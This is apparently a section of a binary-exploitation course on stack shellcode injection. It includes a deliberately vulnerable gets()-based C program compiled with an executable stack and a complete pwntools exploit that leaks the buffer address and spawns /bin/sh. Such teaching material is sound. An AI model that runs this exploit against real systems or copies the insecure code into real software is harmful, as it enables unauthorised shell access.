Definition
We've seen in the previous part that we can redirect the normal execution flow to other functions
already present in the binary.
But real binaries rarely ship with a convenient win() function to jump to.
So what if we want to execute our own code?
This is what we'll learn in this part, using shellcode.
A shellcode is a small piece of machine code, usually written as assembly instructions and then assembled.
It is typically shown as a string of hexadecimal bytes, the opcodes (operation codes) and their operands, and looks something like this:
\x01\x02\x03\x04\x05\x06 ...
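To make that notation concrete, here is a small sketch in plain Python (no pwntools needed). It takes the 44 bytes of the pwntools-generated shellcode that is dumped later in this part and prints them in the \xNN notation. The variable names are ours, chosen for illustration.

```python
# The 44 bytes of the /bin/sh shellcode, copied from the hexdump shown later in this part.
SHELLCODE_HEX = (
    "6a 68 68 2f 2f 2f 73 68 2f 62 69 6e 89 e3 68 01 "
    "01 01 01 81 34 24 72 69 01 01 31 c9 51 6a 04 59 "
    "01 e1 51 89 e1 31 d2 6a 0b 58 cd 80"
)

# bytes.fromhex() ignores the spaces between the byte pairs.
shellcode = bytes.fromhex(SHELLCODE_HEX)

# Render every byte as \xNN, the notation usually used to show shellcode.
escaped = "".join(f"\\x{byte:02x}" for byte in shellcode)

print(len(shellcode), "bytes")
print(escaped)
```

The last two bytes, cd 80, are the int 0x80 instruction that triggers the system call.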
What can we do
With a shellcode, we can do anything the vulnerable process itself is allowed to do: once the CPU starts executing our bytes, any instruction or system call is available.
We could, for example, open a /bin/sh shell.
Why does it work
Injecting shellcode and executing it works because of the Von Neumann architecture, which stores data and instructions in the same memory and does not distinguish between them.
So whatever EIP points to will be executed, even if it comes from user input. As long as the bytes decode to valid instructions and sit in memory that is marked executable, the CPU will run them.
How to use it
As we said, a shellcode is basically just a sequence of machine-code bytes.
A basic exploit using shellcode consists of these steps:
- write the shellcode onto the stack through the vulnerable input
- overwrite the saved return address so that EIP points to the shellcode
- the shellcode is executed when the function returns
Why use a shellcode
- It's small, which matters because a buffer overflow usually doesn't leave much room
- You can do anything with it, as long as you can write it
ASLR
ASLR (Address Space Layout Randomization) is a security technique that randomizes where the stack, heap and libraries are mapped each time a binary runs. It does not directly prevent shellcode execution, but it makes it harder, because the address of the injected shellcode changes on every run. We will discuss that in detail later.
ASLR is generally enabled on modern systems, but it can be bypassed.
For this course, to ease our learning, the address of the vulnerable buffer will always be provided.
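To see whether ASLR is active on a Linux machine, one option is to read the kernel's randomize_va_space setting. The sketch below assumes a Linux host that exposes /proc/sys/kernel/randomize_va_space. The helper name describe_aslr and the wording of the descriptions are ours.

```python
from pathlib import Path

# Linux exposes the ASLR mode through this sysctl file (assumption: Linux host).
ASLR_SYSCTL = Path("/proc/sys/kernel/randomize_va_space")

# Meaning of the documented kernel values.
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and vDSO are randomized",
    2: "same as 1, plus the heap (brk) is randomized",
}


def describe_aslr(raw_value: str) -> str:
    """Translate the content of randomize_va_space into a readable description."""
    return ASLR_MODES.get(int(raw_value.strip()), "unknown value")


if ASLR_SYSCTL.exists():
    print(describe_aslr(ASLR_SYSCTL.read_text()))
else:
    print("randomize_va_space not found (probably not a Linux host)")
```

On most distributions the value is 2, which is why the buffer address changes between runs outside of GDB.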
Generating a shellcode
We will learn how to write our own shellcode at some point, but for now, we will use pwntools shellcraft to generate a shellcode.
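Please do not execute shellcodes found on the Internet unless you have read and understood every instruction.
As explained, a shellcode can do anything the process can, so it can be very dangerous.
Shellcodes from pwntools are open source and documented, and they will be enough for this course.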
- Open Python in REPL (read-eval-print loop) mode from bash
➜ ~ python3
Python 3.11.1 (main, Dec 31 2022, 10:23:59) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>
- Import pwntools
>>> from pwn import *
- Generate a shellcode for a shell
>>> shellcraft.sh()
" /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n /* push b'/bin///sh\\x00' */\n push 0x68\n push 0x732f2f2f\n push 0x6e69622f\n mov ebx, esp\n /* push argument array ['sh\\x00'] */\n /* push 'sh\\x00\\x00' */\n push 0x1010101\n xor dword ptr [esp], 0x1016972\n xor ecx, ecx\n push ecx /* null terminate */\n push 4\n pop ecx\n add ecx, esp\n push ecx /* 'sh\\x00' */\n mov ecx, esp\n xor edx, edx\n /* call execve() */\n push SYS_execve /* 0xb */\n pop eax\n int 0x80\n"
>>>
- Pretty print the shellcode
>>> print(shellcraft.sh())
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push b'/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80
>>>
This is a simple shellcode generated by pwntools: it calls execve('/bin///sh', ['sh'], 0) through int 0x80, so executing it opens a shell.
- Assemble the shellcode into machine code
>>> asm(shellcraft.sh())
b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'
>>>
This is the shellcode in a format that can be injected in a payload.
- We can also print the shellcode in a hexadecimal format
>>> print(hexdump(asm(shellcraft.sh())))
00000000 6a 68 68 2f 2f 2f 73 68 2f 62 69 6e 89 e3 68 01 │jhh/│//sh│/bin│··h·│
00000010 01 01 01 81 34 24 72 69 01 01 31 c9 51 6a 04 59 │····│4$ri│··1·│Qj·Y│
00000020 01 e1 51 89 e1 31 d2 6a 0b 58 cd 80 │··Q·│·1·j│·X··│
0000002c
>>>
Guided example
#include <stdio.h>

void pwnme()
{
    char buffer[100];
    printf("buffer is at %p\n", &buffer);
    puts("overflow me");
    gets(buffer);
}

int main()
{
    pwnme();
    return 0;
}
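Copy and paste the above code into a main.c file.
Then compile it with gcc -m32 -no-pie -z execstack main.c -o main
Here -m32 builds a 32-bit binary, -no-pie keeps the code at a fixed address, and -z execstack marks the stack as executable so that injected shellcode can run from it.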
New stack layout
Just like in the ret2win section, we have a buffer that can be overflowed with user input
coming from gets().
However, this time, there is no win() function and no flag to print.
The goal here is to inject our own shellcode, point EIP to it, and execute it.
Finding the padding should be trivial by now, so this time we'll automate it inside the exploit script: we crash the process with a cyclic pattern and read the faulting address from the core dump.
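from pwn import *

target = './main'
elf = context.binary = ELF(target)

def find_offset() -> int:
    # crash the binary with a cyclic pattern and let it dump core
    p = process()
    p.sendline(cyclic(200))
    p.wait()
    # the faulting address is the 4-byte chunk of the pattern that landed in EIP
    core = Coredump('./core')
    offset = cyclic_find(core.fault_addr)
    return offset

padding = find_offset() # should be 112 bytes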
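To see why a cyclic pattern reveals the offset, here is a simplified stand-in for cyclic() and cyclic_find() in plain Python. It is not the pwntools code, only a sketch of the same idea: a de Bruijn sequence over the lowercase alphabet in which no 4-byte window repeats, so the 4 bytes that end up in EIP identify a single position. The names pattern and find_offset_in_pattern are ours.

```python
from itertools import islice
from string import ascii_lowercase


def de_bruijn(alphabet: str, n: int):
    """Lazily yield a de Bruijn sequence: no n-character window occurs twice."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern(length: int) -> bytes:
    """First `length` bytes of the sequence, using 4-byte windows."""
    return "".join(islice(de_bruijn(ascii_lowercase, 4), length)).encode()


def find_offset_in_pattern(fault_addr: int, length: int = 200) -> int:
    """Locate the 4 bytes that were loaded into EIP inside the pattern."""
    # EIP holds 4 pattern bytes read as a little-endian integer.
    chunk = fault_addr.to_bytes(4, "little")
    return pattern(length).find(chunk)


print(pattern(16))                         # b'aaaabaaacaaadaaa'
print(find_offset_in_pattern(0x62616164))  # 112
```

The fault address 0x62616164 is the one reported in the core dump output of this part. Read as little-endian bytes it is "daab", which sits 112 bytes into the pattern.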
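This time, the shellcode itself has to go onto the stack, at the very start of the buffer.
So our payload should look like:
[shellcode] + [padding] + [ptr to shellcode]
Here the shellcode and the padding together must be exactly as long as the offset found above (112 bytes), so that the pointer lands on the saved return address.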
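The layout above can be sketched in plain Python with the struct module standing in for p32(). The helper name build_payload, the 44-byte placeholder used instead of real shellcode, and the example address are assumptions made for illustration only.

```python
import struct


def build_payload(shellcode: bytes, offset: int, buffer_addr: int) -> bytes:
    """Build [shellcode] + [padding] + [ptr to shellcode] for a 32-bit target."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the saved return address")
    if b"\n" in shellcode:
        # gets() stops reading at a newline, which would truncate the payload
        raise ValueError("shellcode must not contain the byte 0x0a")
    padding = b"A" * (offset - len(shellcode))
    # "<I" packs a 32-bit unsigned integer in little-endian order, like p32()
    return shellcode + padding + struct.pack("<I", buffer_addr)


# 44 NOP bytes standing in for real shellcode (placeholder, not a working exploit)
demo_shellcode = b"\x90" * 44

# 0xffffd5cc is only an example address for the start of the buffer
payload = build_payload(demo_shellcode, offset=112, buffer_addr=0xFFFFD5CC)

print(len(payload))   # 116
print(payload[-4:])   # b'\xcc\xd5\xff\xff'
```

The padding shrinks as the shellcode grows, so the pointer always lands 112 bytes into the input.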
Finding the address of buffer
This section will demonstrate the effect of ASLR. GDB disables ASLR for the programs it runs, so the address of the buffer is always the same when checked inside GDB. However, when we run the binary directly several times, it shows a different address each time.
➜ ~ ./main
buffer is at 0xffe6372c
overflow me
^C
➜ ~ ./main
buffer is at 0xffc44e4c
overflow me
^C
➜ ~ ./main
buffer is at 0xffc0a1fc
overflow me
^C
- Open the binary in gdb
gdb main
- Put a breakpoint on the gets() call (find the offset yourself, you should know how by now)
pwndbg> b *pwnme + 65
- Run the binary
pwndbg> r
- Get the address of the buffer
► 0x80491c3 <pwnme+65> call gets@plt <gets@plt>
arg[0]: 0xffffd5cc ◂— 0xd /* '\r' */
arg[1]: 0xffffd5cc ◂— 0xd /* '\r' */
arg[2]: 0xf7fca410 —▸ 0x80482b9 ◂— 'GLIBC_2.0'
arg[3]: 0x804918e (pwnme+12) ◂— add ebx, 0x2e72
What is the address of the buffer?
Answer: 0xffffd5cc (the first argument passed to gets())
Writing the exploit
In Python:
from pwn import *
target = './main'
elf = context.binary = ELF(target)
padding = 112
shellcode = asm(shellcraft.sh())
payload = shellcode # [shellcode]
payload += b'A' * (padding - len(shellcode)) # [padding]
payload += p32(0xffffd5cc) # [ptr to shellcode]
p = process()
print(p.clean())
p.sendline(payload)
p.interactive() # to interact with the shell
Run it:
➜ ~ python3 exploit.py
[*] '/root/main'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
[+] Starting local process '/root/main': pid 1474
[*] Process '/root/main' stopped with exit code -11 (SIGSEGV) (pid 1474)
[+] Parsing corefile...: Done
[*] '/root/core'
Arch: i386-32-little
EIP: 0x62616164
ESP: 0xffa80cb0
Exe: '/root/main' (0x8048000)
Fault: 0x62616164
[+] Starting local process '/root/main': pid 1484
b'buffer is at 0xff9e36cc\noverflow me\n' # <---- buffer is at 0xff9e36cc
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
[*] Process '/root/main' stopped with exit code -11 (SIGSEGV) (pid 1484)
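It failed: the address we found inside GDB (0xffffd5cc), where ASLR is disabled, is different from the real address of the buffer in this run (0xff9e36cc), so EIP jumped to the wrong place.
Since the binary prints the address of its buffer, we can retrieve it programmatically by adding a few lines to our exploit: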
from pwn import *
target = './main'
elf = context.binary = ELF(target)
def find_offset() -> int:
    p = process()
    p.sendline(cyclic(200))
    p.wait()
    core = Coredump('./core')
    offset = cyclic_find(core.fault_addr)
    return offset
padding = find_offset() # should be 112 bytes
shellcode = asm(shellcraft.sh())
p = process()
p.recvuntil('at ') # we discard output 'buffer is at '
leaked_address = p.recvline()[:-1] # we receive the rest of the output, which is the address, and we remove the last part '\n'
address = int(leaked_address, 0) # we convert the string address into an int, which can be used by p32()
payload = shellcode
payload += b'A' * (padding - len(shellcode))
payload += p32(address)
print(p.clean())
p.sendline(payload)
p.interactive()
➜ ~ python3 exploit.py
[*] '/root/main'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
[+] Starting local process '/root/main': pid 1503
[*] Process '/root/main' stopped with exit code -11 (SIGSEGV) (pid 1503)
[+] Parsing corefile...: Done
[*] '/root/core'
Arch: i386-32-little
EIP: 0x62616164
ESP: 0xffb881d0
Exe: '/root/main' (0x8048000)
Fault: 0x62616164
[+] Starting local process '/root/main': pid 1513
/root/exploit.py:20: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
p.recvuntil('at ') # we discard output 'buffer is at '
b'overflow me\n'
[*] Switching to interactive mode
$ ls
core exploit.py flag.txt main main.c
Congratz, you popped your first shell 🎉
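The address-parsing step of the exploit can be checked in isolation, without running the binary. The sketch below uses plain Python and the banner captured in the failed run earlier in this part. The helper name parse_leak is ours, and struct.pack stands in for p32().

```python
import struct


def parse_leak(banner: bytes) -> int:
    """Extract the address printed after 'buffer is at ' from the program output."""
    marker = b"at "
    start = banner.index(marker) + len(marker)
    # keep everything up to the end of the line, e.g. b'0xff9e36cc'
    hex_addr = banner[start:].split(b"\n", 1)[0]
    # base 16 accepts the leading 0x prefix
    return int(hex_addr, 16)


banner = b"buffer is at 0xff9e36cc\noverflow me\n"
address = parse_leak(banner)

print(hex(address))                # 0xff9e36cc
print(struct.pack("<I", address))  # b'\xcc6\x9e\xff'
```

Passing bytes such as b'at ' to recvuntil(), instead of a str, is also what avoids the BytesWarning visible in the output above.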
Troubleshooting
If you get the error "core file not found", you are probably running on Ubuntu, where core dumps are handed to apport instead of being written to the current directory. To fix that (just for this course), run the following commands on your host machine (outside of your Docker container):
echo core | sudo tee /proc/sys/kernel/core_pattern
echo 0 | sudo tee /proc/sys/kernel/core_uses_pid